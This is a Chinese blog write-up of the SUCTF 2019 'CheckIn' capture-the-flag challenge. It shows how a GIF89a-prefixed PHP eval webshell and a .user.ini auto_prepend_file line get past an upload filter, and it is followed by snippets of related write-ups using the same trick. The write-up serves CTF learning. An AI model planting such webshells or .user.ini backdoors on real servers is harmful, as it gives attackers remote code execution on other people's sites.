[SUCTF 2019]CheckIn(.user.ini)

最新推荐文章于 2023-10-10 21:24:55 发布
最新推荐文章于 2023-10-10 21:24:55 发布
阅读量1.4k 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104682702
版权

知识点:

.user.ini文件

在这里插入图片描述
PHP_INI_*模式的定义

模式含义
PHP_INI_USER可在用户脚本(例如 ini_set())或 Windows 注册表(自 PHP 5.3 起)以及 .user.ini 中设定
PHP_INI_PERDIR可在 php.ini,.htaccess 或 httpd.conf 中设定
PHP_INI_SYSTEM可在 php.ini 或 httpd.conf 中设定
PHP_INI_ALL可在任何地方设定

也就是说.user.ini是由用户自定义的。

虽然许多敏感的配置项,都基本是PHP_INI_SYSTEM模式的,但是仍然可以利用.user.ini文件来构造一个后门。

利用的配置项:
auto_prepend_file 指定一个文件,自动包含在要执行的文件前
auto_append_file 指定一个文件,自动包含在要执行的文件后

使用该设置,比较灵活,不需要重启服务器,也不需要管理员权限,唯一缺点是目录中每个被读取和被解释的文件每次都要进行处理,而不是在启动时处理一次,所以性能会有所降低。

于是我们就可以用这两个配置来包含木马文件,当我们访问index.php时,就会自动的包含木马文件。

解题:

先写一个木马文件a.jpg,因为限制了是img,且将木马后缀改为jpg上传失败,应该是检测了文件头,于是加上文件头GIF89a,上传成功。
在这里插入图片描述

GIF89a
<script language="PHP"> @eval($_POST['pass']); </script>

然后创建一个.user.ini文件,在里面写上配置项,包含我们要上传的木马文件a.jpg
在这里插入图片描述

GIF89a
auto_prepend_file=a.jpg

然后将两个文件上传:
在这里插入图片描述
可以看到在上传路径uploads/76d9f00467e5ee6abc3ca60892ef304e上有我们上传的两个文件和index.php

蚁剑链接:

http://45fbbdef-40b8-4f6e-bbfd-14816eb8dd19.node3.buuoj.cn/uploads/76d9f00467e5ee6abc3ca60892ef304e/index.php

在这里插入图片描述在这里插入图片描述

天问_Herbert555
关注
专栏目录
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6190
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
SUctf checkIn
舞动的獾
10-08 554
看了道上传的关于.user.ini的题目,这里试着做一下 题目地址 buuctf checkln 打开题目,出现了简单的上传框 试着上传php文件 更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<?内容进行了检验。 我们可以构造这种形式的木马 <script language="php"> @eval($_P...
.user.ini文件构成的PHP后门
11-14 667
http://drops.wooyun.org/tips/3424 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastc...
suctf-checkin+.user.ini+.htaccess绕过
unexpectedthing的博客
10-28 264
文章目录前言wp.user.ini绕过.htaccess绕过 前言 由这个题和MRCTF中的我传你吗这两个题总结.htaccess和.user.ini绕过文件上传 wp 首先这个题就是用.user.ini或者.htaccess来绕过 我们传png文件,看到exif_imagetype:not image! exif_imagetype,就是用来检查图像类型的 必须要gif文件,但是我们在文件内容上加个魔法头GIF89a,就可以绕过 我们用后缀为.user.ini或者.htaccess,发现只要加个魔法头都
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 543
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 649
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
SUCTF web CheckIn
weixin_42499640的博客
08-19 2736
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1087
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
[SUCTF 2019]CheckIn(文件上传)
记录学习,一起进步
03-27 548
[SUCTF 2019]CheckIn(文件上传)
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1179
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
BUUCTF-[SUCTF 2019]CheckIn
最新发布
m0_61361405的博客
10-10 136
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
文件上传之.htaccess和.user.ini
m0_46587008的博客
05-20 1411
文章目录前言一、基本描述二、配置与使用三、实战1、总结 前言 提示:最近写文件上传的题目经常碰到关于.htaccess和.user.ini文件的使用问题,我不了解Apache和php配置文件,所以想借着这次机会好好着重了解一些这两个配置文件 一、基本描述 1、.htaccess。 百科对于.htaccess的解读是:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/
File "weibo_checkin.py", line 1 Skip to content ^ SyntaxError: invalid syntax
04-30
这个错误可能是因为你的代码开头有一行非法的语法,可能是注释、空行或者其它语法错误。检查一下代码的开头,确保第一行是正确的语法,例如: ```python #!/usr/bin/env python # -*- coding: utf-8 -*- ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值